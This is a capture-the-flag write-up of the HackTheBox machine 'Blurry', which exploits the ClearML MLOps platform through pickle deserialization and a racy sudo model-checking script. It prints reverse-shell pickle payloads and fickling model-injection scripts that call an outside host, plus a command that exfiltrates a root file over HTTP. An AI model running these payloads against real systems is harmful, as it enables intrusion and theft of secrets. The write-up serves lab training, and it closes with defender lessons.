Blurry

INTRODUCTION

Blurry was released as the eighth box in HTB’s Season V, Anomalies. This box is all about attacking an AI/ML platform called ClearML. ClearML is a system for orchestrating various AI/ML platforms, running models and experiments on a remote server. It has an extensive Python API, which we use repeatedly while solving this box. This box is on the easier side of “medium”, but was still a reasonable challenge.

This box only has http and ssh, so recon is very straightforward, comprising of little more than just a subdomain scan. You don’t even need to do any directory enumeration. You’ll discover a few subdomains, all of which are related to ClearML. One of them only provides a hint, but the other two are used in foothold.

Achieving a foothold took a few tries and a little creativity, but all of the information you need is already documented by a blog that disclosed the relevant CVEs. I didn’t find any PoC code, so it’s likely you’ll have to write it yourself. The code shown in the blog post is very useful, but is not enough to get you all the way to a foothold - read very carefully the pitfalls the authors experienced, and you’ll have a better idea of how to exploit Blurry for a foothold.

The user flag is available right after gaining foothold, but the root flag is where your journey could take two paths. A little bit of local enumeration leads you two an important script on the box. One way (likely unintended by the author of the box) is very easy: it’s a misconfiguration you may have encountered when doing the “Starting Point” path on HTB. The other way takes a little fiddling, but isn’t too tough either: very careful code analysis will reveal some insecurely-written logic in a sudo-able script.

All in all, this was a fantastic box. Highly recommend it!

title picture

RECON

nmap scans

Port scan

For this box, I’m running my typical enumeration strategy. I set up a directory for the box, with a nmap subdirectory. Then set $RADDR to the target machine’s IP, and scanned it with a simple but broad port scan:

sudo nmap -p- -O --min-rate 1000 -oN nmap/port-scan-tcp.txt $RADDR

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Script scan

To investigate a little further, I ran a script scan over the TCP ports I just found:

TCPPORTS=`grep "^[0-9]\+/tcp" nmap/port-scan-tcp.txt | sed 's/^\([0-9]\+\)\/tcp.*/\1/g' | tr '\n' ',' | sed 's/,$//g'`
sudo nmap -sV -sC -n -Pn -p$TCPPORTS -oN nmap/script-scan-tcp.txt $RADDR

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to http://app.blurry.htb/

Vuln scan

Now that we know what services might be running, I’ll do a vulnerability scan:

sudo nmap -n -Pn -p$TCPPORTS -oN nmap/vuln-scan-tcp.txt --script 'safe and vuln' $RADDR

No results from the vuln scan.

UDP scan

To be thorough, I also did a scan over the common UDP ports:

sudo nmap -sUV -T4 -F --version-intensity 0 -oN nmap/port-scan-udp.txt $RADDR

No results from scanning the top 100 UDP ports.

Webserver Strategy

Noting the redirect from the nmap scan, I added app.blurry.htb to /etc/hosts and did banner grabbing on that domain:

DOMAIN=blurry.htb
echo "$RADDR $DOMAIN" | sudo tee -a /etc/hosts
echo "$RADDR app.$DOMAIN" | sudo tee -a /etc/hosts

☝️ I use tee instead of the append operator >> so that I don’t accidentally blow away my /etc/hosts file with a typo of > when I meant to write >>.

whatweb --aggression 3 http://app.blurry.htb && curl -IL http://$RADDR

whatweb

Next I performed vhost and subdomain enumeration:

WLIST="/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt"
ffuf -w $WLIST -u http://$RADDR/ -H "Host: FUZZ.htb" -c -t 60 -o fuzzing/vhost-root.md -of md -timeout 4 -ic -ac -v

No result there. I’ll assume that the only domain is blurry.htb. Now I’ll check for subdomains of blurry.htb - maybe it’s not only app.blurry.htb?

ffuf -w $WLIST -u http://$RADDR/ -H "Host: FUZZ.$DOMAIN" -c -t 60 -o fuzzing/vhost-$DOMAIN.md -of md -timeout 4 -ic -ac -v

subdomain enumeration

Aha! There are at least two additional subdomains. I’ll add them to /etc/hosts before continuing:

echo "$RADDR files.$DOMAIN" | sudo tee -a /etc/hosts
echo "$RADDR chat.$DOMAIN" | sudo tee -a /etc/hosts

I’ll move on to directory enumeration on app.blurry.htb, chat.blurry.htb and files.blurry.htb:

WLIST="/usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt";
ffuf -w $WLIST:FUZZ -u http://files.$DOMAIN/FUZZ -t 80 -c -o ffuf-directories-files -of json -e .php,.html,.txt -timeout 1 -v;

No results there. What about chat?

ffuf -w $WLIST:FUZZ -u http://chat.$DOMAIN/FUZZ -t 80 -c -o ffuf-directories-chat -of json -e .php,.html,.txt -timeout 1 -v;

Nothing important. And app?

ffuf -w $WLIST:FUZZ -u http://app.$DOMAIN/FUZZ -t 80 -c -o ffuf-directories-app -of json -e .php,.html,.txt -timeout 1 -v;

The results were only directories that can be easily found by traversing/spidering the website.

Exploring the Website

The subdomain from the original http redirect shows a simple logon page for ClearML. Just enter a name to proceed:

app index

This leads to the ClearML web app, which has many features:

app dashboard

The dashboard shows a couple of recent projects. I’ll investigate more after checking the other two subdomains.

The chat.blurry.htb subdomain shows some kind of chat web app, with a window title of Blurry Vision.

chat index

I registered an account using the credentials jimbob : password123 and logged in. There’s one message notification waiting for me. Checking it out, I see that there is a prior conversation that my new user has just entered:

chat history

The DevOps platform that irisview is referring to might be ClearML itself. It’s also good to see that jippity is tagged as an Admin.

Vulnerability Research

ClearML

Since the name “ClearML” fits quite nicely with the name of the box, I decided to begin my search for vulnerabilities (or any prior works) with that. Thankfully, not too much searching led to a very helpful article written by a team that found six zero-days in ClearML!

https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/

They included a handy video for each vulnerability. The one below even shows quite clearly that the files.blurry.htb subdomain is the fileserver (that usually runs on port 8081) and is vulnerable to an LFI:

On that same post, there is an even more powerful technique shown: uploading a malicious pickle and having the target deserialize it. If all goes according to plan, this might be a way to get RCE quite easily:

I’ll investigate this method after I finish researching the web services running on the target 🚩

Rocket Chat

There is a HackTricks page on how to abuse Rocket Chat to lead to RCE. However, it requires setting up an webhook, something that it seems my low-priv jimbob user lacks access to.

It seems that there is also an exploit for CVE-2021-22911 that involves NoSQL injection to gain an administrator’s auth token. It says this exploit will work for Rocket Chat 3.12.1 - so what version are we using? It doesn’t seem to say anywhere in the UI.

Thankfully, a reply in the Rocket Chat github repo Issues shows that it’s possible to find the version by checking http://chat.blurry.htb/api/info:

rocket chat version

I.e. the exploit for CVE-2021-22911 will not be useful here.

FOOTHOLD

ClearML Pickle Deserialization

If I’m not mistaken, I should be able to use two of the techniques shown on the article mentioned above - combining CVE-2024-24592 (“Improper Auth Leading to Arbitrary Read-Write Access”) with CVE-2024-24590 (“Pickle Load on Artifact Get”) to achieve RCE.

Here’s an overview of the steps:

Start a reverse shell listener
Locate the Task ID of of some task I want to utilize (or create my own?)
Write a Python class with a malicious __reduce__() function. Create an object from that class and pickle it into a file.
Utilize CVE-2024-24592 to upload the pickle as an artifact to the target Task.
Attempt to access the pickle, thus utlizing CVE-2024-24590 to execute the payload (reverse shell?)

Let’s prepare for this attack scenario. First, I’ll prepare the reverse shell listener:

sudo ufw allow from $RADDR to any port 4444 proto tcp
ip a s tun0  # (My address is 10.10.14.12)
bash
nc -lvnp 4444

Next, prepare a python venv and install clearml:

cd exploit
python3 -m venv .
source bin/activate
pip3 install clearml

Now write a malicious class and pickle it. pickleme.py:

import os, pickle

class RunCommand():
    def __reduce__(self):
        return (os.system, ("bash -c 'sh -i >& /dev/tcp/10.10.14.12/4444 0>&1'",))

command = RunCommand()

with open('revshell.pkl', 'wb') as f:
    pickle.dump(command, f)

python3 pickleme.py

This successfully created the malicious pickle, written into revshell.pkl. Now I’ll need to upload this pickle as an artifact. According to the docs, I’ll need to locate a valid Task ID. I’ll do this by perusing through the experiments of the “Black Swan” project.

finding task ID

To upload the pickle, I’ll use the clearml python API again:

from  clearml import Task

target_task = 'fa54c922dd4d449494c5c00192819e88'
task = Task.get_task(task_id=target_task)

task.upload_artifact(name='pickle_artifact',
                     artifact_object='revshell.pkl', 
                     retries=2,
                     wait_on_upload=True,
                     extension_name='.pkl')

python3 upload_artifact.py

As expected, this didn’t work - how would my attacker box know where to upload the artifact to?

Initializing ClearML

clearml.backend_api.session.defs.MissingConfigError: It seems ClearML is not configured on this machine! To get started with ClearML, setup your own 'clearml-server' or create a free account at https://app.clear.ml Setup instructions can be found here: https://clear.ml/docs

Thankfully, the documentation it links to actually has some helpful instructions on initializing our connection to the ClearML server:

clearml-init

This runs a wizard for configuring ClearML locally. It first asks us to generate some credentials, which are available through the web app (app.blurry.htb) via the user’s Settings > Workspace then generating new credentials:

creating clearml creds

api { 
    web_server: http://app.blurry.htb
    api_server: http://api.blurry.htb
    files_server: http://files.blurry.htb
    credentials {
        "access_key" = "CAY3C2MLVYI6XK719N9E"
        "secret_key"  = "4pk2Tg1BzdDAggz39FCeT5c73cbHB0L0SbQn6osQChTewLCcxI"
    }
}

This configuration references api.blurry.htb - did I miss a subdomain?

api subdomain

Oof! I did miss that subdomain 😬 I’ll at that to /etc/hosts and initialize ClearML:

echo "$RADDR api.$DOMAIN" | sudo tee -a /etc/hosts
clearml-init

configured clearml

Perfect. It seems like it initialized properly.

Uploading an artifact

Now let’s try that upload script again:

failed to upload

Hmm… I guess it failed because the task I’m using already has the published status? A little more reading of the blog disclosing these CVEs let me know that they actually didn’t upload to an existing task - they instead made a new one:

When we first tried to exploit this, we realized that using the upload_artifact method, as seen in Figure 5, will wrap the location of the uploaded pickle file in another pickle. Upon discovering this, we created a script that would interface directly with the API to create a task and upload our malicious pickle in place of the file path pickle.

They say to upload the “malicious pickle in place of the file path pickle”. I suppose that means I shouldn’t save the pickle into a file, I should instead just upload it directly. I’ll modifiy upload.artifact.py accordingly - basically to merge my two scripts into one:

from  clearml import Task
import os, pickle

class RunCommand():
    def __reduce__(self):
        cmd = "bash -c 'sh -i >& /dev/tcp/10.10.14.12/4444 0>&1'"
        return (os.system, (cmd,))

command = RunCommand()
task = Task.init(project_name='White Swan',
                 task_name='my_artifact_upload',
                 output_uri=True)
task.upload_artifact(name='pickle_artifact',
                     artifact_object=command, 
                     retries=2,
                     wait_on_upload=True, 
                     extension_name=".pkl")
artifact = task.artifacts.get('pickle_artifact')
pickle_local_path = artifact.get()

I’ll delete the project I just initialized, and try again using this new version of upload_artifact.py:

deleting project

☝️ You’ll need to go into the project and archive the task inside before you’ll be allowed to delete the project.

upload success

That process hangs, and a reverse shell opens! 🙂

failed reverse shell

But the reverse shell is to… myself? 🙃

Usable reverse shell

I once again read the notes on CVE-2024-24590 from the blog post on disclosing the ClearML CVEs, and found some subtle wording that I hadn’t noticed before:

“When a user calls the get method within the Artifact class to download and load a file into memory, the pickle file is deserialized on their system, running any arbitrary code it contains.”

That’s right, the pickle is deserialized “on their system” - The mistake I made is that it’s my system making the call to artifact.get(). I need to find a way to get the target to call the Artifact get() method instead of me!

Thankfully, the trick was sitting in plain sight. There is a task running in the “Black Swan” project every three minutes, called “Review JSON Artifacts”. Here’s the code it’s running:

#!/usr/bin/python3

from clearml import Task
from multiprocessing import Process
from clearml.backend_api.session.client import APIClient

def process_json_artifact(data, artifact_name):
    """
    Process a JSON artifact represented as a Python dictionary.
    Print all key-value pairs contained in the dictionary.
    """
    print(f"[+] Artifact '{artifact_name}' Contents:")
    for key, value in data.items():
        print(f" - {key}: {value}")

def process_task(task):
    artifacts = task.artifacts
    
    for artifact_name, artifact_object in artifacts.items():
        data = artifact_object.get()
        
        if isinstance(data, dict):
            process_json_artifact(data, artifact_name)
        else:
            print(f"[!] Artifact '{artifact_name}' content is not a dictionary.")

def main():
    review_task = Task.init(project_name="Black Swan", 
                            task_name="Review JSON Artifacts", 
                            task_type=Task.TaskTypes.data_processing)

    # Retrieve tasks tagged for review
    tasks = Task.get_tasks(project_name='Black Swan', tags=["review"], allow_archived=False)

    if not tasks:
        print("[!] No tasks up for review.")
        return
    
    threads = []
    for task in tasks:
        print(f"[+] Reviewing artifacts from task: {task.name} (ID: {task.id})")
        p = Process(target=process_task, args=(task,))
        p.start()
        threads.append(p)
        task.set_archived(True)

    for thread in threads:
        thread.join(60)
        if thread.is_alive():
            thread.terminate()

    # Mark the ClearML task as completed
    review_task.close()

def cleanup():
    client = APIClient()
    tasks = client.tasks.get_all(
        system_tags=["archived"],
        only_fields=["id"],
        order_by=["-last_update"],
        page_size=100,
        page=0,
    )

    # delete and cleanup tasks
    for task in tasks:
        # noinspection PyBroadException
        try:
            deleted_task = Task.get_task(task_id=task.id)
            deleted_task.delete(
                delete_artifacts_and_models=True,
                skip_models_used_by_other_tasks=True,
                raise_on_error=False
            )
        except Exception as ex:
            continue

if __name__ == "__main__":
    main()
    cleanup()

There’s a call to the Artifact get() method in process_task(). Therefore, it’s the owner of the process running this task (jippity) that would be opening the reverse shell.

How do we get the process_task() code to run? This code seems to be loading and running any artifacts inside the “Black Swan” project that are tagged with “review”, so I’ll modify my upload_artifact.py to do this instead:

from  clearml import Task
import os, pickle

class RunCommand():
    def __reduce__(self):
        cmd = "bash -c 'sh -i >& /dev/tcp/10.10.14.12/4444 0>&1'"
        return (os.system, (cmd,))

command = RunCommand()
task = Task.init(project_name='Black Swan',
                 task_name='my_artifact_upload',
                 tags='review',
                 output_uri=True)

task.upload_artifact(name='pickle_artifact',
                     artifact_object=command, 
                     retries=2,
                     wait_on_upload=True, 
                     extension_name=".pkl")
#artifact = task.artifacts.get('pickle_artifact')
#pickle_local_path = artifact.get()

I’ll once again run this code:

python3 upload_artifact.py

Then, after waiting a few minutes, a reverse shell opened!

reverse shell success

And this time it’s actually another user 😁 As expected, we opened a reverse shell as jippity.

USER FLAG

Upgrade the shell

I’ll follow the process outlined in my guide on upgrading the shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'
[Ctrl+Z] stty raw -echo; fg [Enter] [Enter] 
export TERM=xterm-256color
export SHELL=bash
stty rows 35 columns 120

Get the flag

The reverse shell opens at /home/jippity, adjacent to the user flag.

user flag

Simply cat it out for the points:

cat user.txt

SSH

The /home/jippity directory also has .ssh, with a key sitting inside. We can simply read the key and transfer it back to the attacker machine, for an easy way to get back in without re-exploiting:

found ssh

Write a new id_rsa file and copy in the contents. Then just change permissions and use the key for login:

cd loot
vim id_rsa  # copy in the key contents
chmod 600 id_rsa
ssh -i id_rsa jippity@$RADDR

ssh as jippity

ROOT FLAG

Local enumeration: jippity

The home directory has more contents than just the flag and SSH though. There is some stuff pertaining to ClearML. clearml.conf has an API access & secret key:

"access_key": "8TL83TDO2YXCQ4789DE4", 
"secret_key": "peFoHVcUTMA0JdhOHNoQTioLSmtbKEiAVxZXJSHku4LyHlOTUB"

Surprisingly, I was able to get the sudo list for jippity without any password:

sudo list

☝️ As usual, that’s a pretty strong indicator of a privesc vector.

Since that’s clearly a custom binary, let’s check if there’s any source code for it sitting around:

evaluate model 2

The evaluate_model.py contents are as follows:

import subprocess
import sys

def run_command(command):
    """Helper function to run a command in the shell."""
    try:
        result = subprocess.run(command, check=True, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        print(result.stdout.decode())
    except subprocess.CalledProcessError as e:
        print(f"Error occurred: {e.stderr.decode()}")
        sys.exit(1)

def create_user(username, password):
    """Creates a new user with the specified username and password."""
    # Create the user with the specified username
    run_command(f"sudo useradd -m {username}")

    # Set the user's password
    run_command(f"echo '{username}:{password}' | sudo chpasswd")

    # Add the user to the sudo group
    run_command(f"sudo usermod -aG sudo {username}")

if __name__ == "__main__":
    # Define username and password here
    username = "admin"
    password = "password"

    create_user(username, password)
    print(f"User '{username}' has been created and added to the sudo group.")

Haha it’s like they’re taunting us with that run_command() functon 😂

The shell script at /usr/bin/evaluate_model has the following contents:

#!/bin/bash
# Evaluate a given model against our proprietary dataset.
# Security checks against model file included.

if [ "$#" -ne 1 ]; then
    /usr/bin/echo "Usage: $0 <path_to_model.pth>"
    exit 1
fi

MODEL_FILE="$1"
TEMP_DIR="/models/temp"
PYTHON_SCRIPT="/models/evaluate_model.py"  

/usr/bin/mkdir -p "$TEMP_DIR"

file_type=$(/usr/bin/file --brief "$MODEL_FILE")

# Extract based on file type
if [[ "$file_type" == *"POSIX tar archive"* ]]; then
    # POSIX tar archive (older PyTorch format)
    /usr/bin/tar -xf "$MODEL_FILE" -C "$TEMP_DIR"
elif [[ "$file_type" == *"Zip archive data"* ]]; then
    # Zip archive (newer PyTorch format)
    /usr/bin/unzip -q "$MODEL_FILE" -d "$TEMP_DIR"
else
    /usr/bin/echo "[!] Unknown or unsupported file format for $MODEL_FILE"
    exit 2
fi

/usr/bin/find "$TEMP_DIR" -type f \( -name "*.pkl" -o -name "pickle" \) -print0 | while IFS= read -r -d $'\0' extracted_pkl; do
    fickling_output=$(/usr/local/bin/fickling -s --json-output /dev/fd/1 "$extracted_pkl")

    if /usr/bin/echo "$fickling_output" | /usr/bin/jq -e 'select(.severity == "OVERTLY_MALICIOUS")' >/dev/null; then
        /usr/bin/echo "[!] Model $MODEL_FILE contains OVERTLY_MALICIOUS components and will be deleted."
        /bin/rm "$MODEL_FILE"
        break
    fi
done

/usr/bin/find "$TEMP_DIR" -type f -exec /bin/rm {} +
/bin/rm -rf "$TEMP_DIR"

if [ -f "$MODEL_FILE" ]; then
    /usr/bin/echo "[+] Model $MODEL_FILE is considered safe. Processing..."
    /usr/bin/python3 "$PYTHON_SCRIPT" "$MODEL_FILE"
    
fi

Oh? It looks like this whole shell script is just for “sanitizing” the pth file that is passed to the evaluate_model.py script. It does all this sanitization, but fails to mitigate the more obvious risk - that the evaluate_model.py script is modifiable by a low-priv user!

We can sudo /usr/bin/evaluate_model, which in turn runs the python script, so why not just edit the python script? There’s even a handy function within the script that helps us abuse it 👀

First, I’ll set up another reverse shell listener:

sudo ufw allow from $RADDR to any port 4445 proto tcp
bash
nc -lvnp 4445

Modify the script to use a simple nc reverse shell (tested on the jippity user first, which was successful):

changes to evaluate_model

Finally, just run the binary using any “safe” model, such as the demo_model.pth:

sudo /usr/bin/evaluate_model /models/demo_model.pth &

And we get a reverse shell as root!

root reverse shell

🍍 That’s all there is to it - the root flag is in the usual spot, at /root/root.txt. Simply cat it out to finish the box:

cat /root/root.txt

EXTRA CREDIT: ALTERNATE PRIVESC

Aside: what the pth

Running file over the .pth file reveals that it’s actually a zip archive. Let’s transfer it back to my attacker machine and take a look inside. To do this, I’ll start up an http server and upload demo_model.pth:

👇 I’m using my own tool, simple-http-server. It’s just a slight improvement on Python http.server, a lot like a PHP server, but with a few advantages for file upload and data exfiltration using base64.

sudo ufw allow from $RADDR to any port 8000 proto tcp
cd loot
simple-server 8000 -v

Then upload the file from the target:

upload model

Unzipping this file on my attacker machine, I see that it contains a bunch of data and a pickle:

demo model

I’d love to just examine this pickle directly, but it looks like I have to actually load the pickle it before I can see the source code contained inside. Here’s how I’ll get the code:

import sys
import pickle
#import pickletools
import inspect

filepath = sys.argv[1]
with open(filepath, 'rb') as file:
    #pickletools.dis(file)
    obj = pickle.load(file)
    if inspect.isfunction(obj) or inspect.isclass(obj):
        source_code = inspect.getsource(obj)
        print(source_code)

However, running this makes the interpreter complain that I don’t have torch installed, so I’ll go get it:

python3 -m venv .
source bin/activate
pip3 install torch  # Requires at least 1.5GB of downloads
pip3 install torchvision

As this is downloading, I’m wondering to myself: is it even necessary to load the code in this pickle? After all, we know this pickle is being loaded by the target, so maybe the privesc here is to simply make my own pickle and package it into my own .pth file? 🤔

Detecting model version

There’s a tool called fickling that specializes in both creating and detecting pickles used in AI/ML.

pip3 install fickling

Now we can use fickling to detect the type of model that demo_model.pth is using:

import fickling.polyglot as polyglot
filename = '../loot/smaller_cifar_net/data.pkl'
potential_formats = polyglot.identify_pytorch_file_format(filename, print_results=True)
potential_formats_legacy = polyglot.identify_pytorch_file_format(filename, print_results=True)

existing model version

It seems confident the existing model is PyTorch v0.1.10. Is that important? Not sure yet.

Malicious pickle in the model

There’s another feature that fickling claims will inject arbitrary python code into a model. Check out their PoC example as a reference. Here’s my thinned-down version:

import sys
import torch
import torchvision.models as models
from fickling.pytorch import PyTorchModelWrapper

if len(sys.argv) < 3:
    print(f'Usage: {sys.argv[0]} <pickle_file> <cmd>')
    sys.exit()
    
FILEPATH = sys.argv[1]
CMD = sys.argv[2]

# Load example PyTorch model
model = models.mobilenet_v2()
torch.save(model, FILEPATH)

# Wrap model file into fickling
result = PyTorchModelWrapper(FILEPATH)

# Inject payload, overwriting the existing file instead of creating a new one
temp_filename = "temp_filename.pt"
result.inject_payload(
    CMD,
    temp_filename,
    injection="insertion",
    overwrite=True,
)

I’ll run the script, then prepare for an incoming reverse shell:

python3 inject_into_torch.py revsh.pth \
'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.12",4445));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
mv revsh.pth ../www/  # Directory that http server is serving
bash
nc -lvnp 4445

Now, from the target, I’ll download the model into a directory other than /models, copy it into /models, then run evaluate_model using my malicious .pth file.

👇 The /models directory is periodically cleaned-up. To avoid having to repeatedly download my malicious .pth, I’ll use another directory that isn’t affected by the cleanup script.

curl -o /tmp/.Tools/revsh.pth http://10.10.14.12:8000/revsh.pth
cp /tmp/.Tools/revsh.pth /models/ && sudo /usr/bin/evaluate_model /models/revsh.pth

However, it fails to execute. The message indicates that the target is also using fickling to test whether or not the model is malicious. Talk about fighting fire with fire:

fickling fail

😂 Yeah, I guess that was “overtly malicious”… Maybe I should be more subtle?

Instead of a reverse shell, I’ll just make a web request to exfiltrate the root flag contents. Here’s the new payload:

import base64, requests; contents = base64.b64encode(open('/root/root.txt', 'rb').read()).decode('utf-8'); requests.get(f'http://10.10.14.12:8000/?b64={contents}')

First, I’ll test this idea with the user flag:

exfil test 2

Yep, that works perfectly - now let’s wrap that into a fresh pth file:

python3 inject_into_torch.py exfil.pth \
"import base64, requests; contents = base64.b64encode(open('/root/root.txt', 'rb').read()).decode('utf-8'); requests.get(f'http://10.10.14.12:8000/?b64={contents}')"
mv exfil.pth ../www/

Then, from the target via SSH:

curl -o /tmp/.Tools/exfil.pth http://10.10.14.12:8000/exfil.pth
cp /tmp/.Tools/exfil.pth /models/ && sudo /usr/bin/evaluate_model /models/exfil.pth

Same result! /usr/bin/evaluate_model claims the model is “overtly malicious” 🙄

Tricking evaluate_model

Taking a closer look at /usr/bin/evaluate_model we can actually see that there is a coding error. We can trick evaluate_model’s use of fickling by introducing a race condition! Take another look at the end of /usr/bin/evaluate_model to see why.

# ...
if [ -f "$MODEL_FILE" ]; then
    /usr/bin/echo "[+] Model $MODEL_FILE is considered safe. Processing..."
    /usr/bin/python3 "$PYTHON_SCRIPT" "$MODEL_FILE"
fi

The script assumes that if the provided .pth file is still present by the time this clause is executed, it was actually deemed safe by fickling. It’s a subtle bug, but definitely one we can exploit.

This bug could have been avoided by a pretty easy change to the script:
Generate a random number or hash, and make a temporary filename [random_number]_model.pth
Using the elevated process, copy the model provided as an argument over to any other directory, perhaps /tmp/[random_number]_model.pth
Run the fickling safety check on this temp file that has a randomized name, instead of the one provided as an argument.
Run /usr/bin/python3 "$PYTHON_SCRIPT" [random_number]_model.pth instead of the code shown above.

In short, we can exploit this by constantly copying over the malicious model. That way, if we’re lucky at least one of the copy operations will occur when evaluate_model is between these two lines:

/bin/rm "$MODEL_FILE"
# ...
if [ -f "$MODEL_FILE" ]; then

Here’s my script loop_copy.sh to constantly copy my malicious pth file into /models:

#!/bin/bash
while true
do
        cp /tmp/.Tools/revsh.pth /models/test.pth
done

And here’s my script loop_evaluate.sh to keep trying evaluate_model over and over until it eventually opens a reverse shell:

#!/bin/bash
while true
do
        sudo /usr/bin/evaluate_model /models/test.pth
done

I’ll run the former in the background, and the latter in the foreground:

/tmp/.Tools/loop_copy.sh &
/tmp/.Tools/loop_evaluate.sh

After a few iterations of loop_evaluate, I saw a connection arrive at my reverse shell listener…

root revshell fail

…but it closed right away. Could just be the wrong reverse shell to attempt. I’ll try a bash reverse shell instead of a pure python one:

I used a bash reverse shell as an initial foothold. So why not try that one again?

python3 inject_into_torch.py revsh.pth \
"import os;os.system('bash -c \"sh -i >& /dev/tcp/10.10.14.12/4445 0>&1\"')"
mv revsh.pth ../www/  # Directory that http server is serving

Now download the new payload to the target and try again:

# pkill loop_copy.sh
curl -o /tmp/.Tools/revsh.pth http://10.10.14.12:8000/revsh.pth
/tmp/.Tools/loop_copy.sh &
/tmp/.Tools/loop_evaluate.sh

It worked almost instantly. Oddly, it didn’t open a reverse shell, but we got escalated privilege within the shell directly 🤔

root shell again

🎉 Success! We have just pwned the box in a second way!

Just in case we are overly concerned with gaining a second reverse shell as root, we can now easily open one:

bash -c 'sh -i >& /dev/tcp/10.10.14.12/4445 0>&1'

root shell again 2

CLEANUP

Target

I’ll get rid of the spot where I place my tools, /tmp/.Tools:

pkill loop_copy.sh
rm -rf /tmp/.Tools
rm /models/exfil.pth /models/revsh.pth /models/test.pth

Attacker

There’s also a little cleanup to do on my local / attacker machine. It’s a good idea to get rid of any “loot” and source code I collected that didn’t end up being useful, just to save disk space:

cd loot
rm -rf my_model.pth demo_model.pth smaller_cifar_net smaller_cifar_net.bak
# I'll only keep id_rsa

There’s also the matter of getting rid of my python venv that contains pytorch (which is huge):

cd ../exploit
deactivate # deactivate the venv
rm -rf ./bin ./include ./lib* ./share

It’s also good policy to get rid of any extraneous firewall rules I may have defined. This one-liner just deletes all the ufw rules:

NUM_RULES=$(($(sudo ufw status numbered | wc -l)-5)); for (( i=0; i<$NUM_RULES; i++ )); do sudo ufw --force delete 1; done; sudo ufw status numbered;

Finally, clean up /etc/hosts:

sudo sed -i '/blurry.htb/d' /etc/hosts

LESSONS LEARNED

Attacker

📖 Read disclosure blogs very carefully. Many of the better infosec articles are surprisingly well-written. Sometimes there is a lot of detail in their words; it can be easy to miss if you’re skimming an article. Be sure to read actively and carefully. On this box, I missed a few details intially, causing me substantial delays.
😈 Malicious pickles are so easy! Keep an eye out for any time that an application implicitly trusts (or takes as input) a pickle. It is trivial to include malicious code inside the pickle. This whole process is made even easier by tools like fickling.

Defender

🥒 Never trust a pickle you don’t know. The only way to use pickles in a reasonably safe manner is to use a cryptographic signature on the pickle. If you can’t verify the pickle’s integrity, it shouldn’t be used as an input to a program.
⚙️ Don’t overlook the boring stuff. It seems that the developers on this box put a great deal of thought into how to protect their model from “overtly malicious” components, but failed to practice good file-permission hygeine. Good security isn’t always about preventing 0-days and nation state actors - sometimes it’s just about good ol’ access control.
👓 Secure coding practices are tough, but important. We demonstrated in the previous section how to exploit a subtle flaw in the evaluate_model script logic. This flaw could have been avoided by using a temporary, randomized filename - something that a good web developer would do instinctively for any file upload. However, since this script was intended for a trusted user (jippity) the author of the script was too trusting of the execution environment.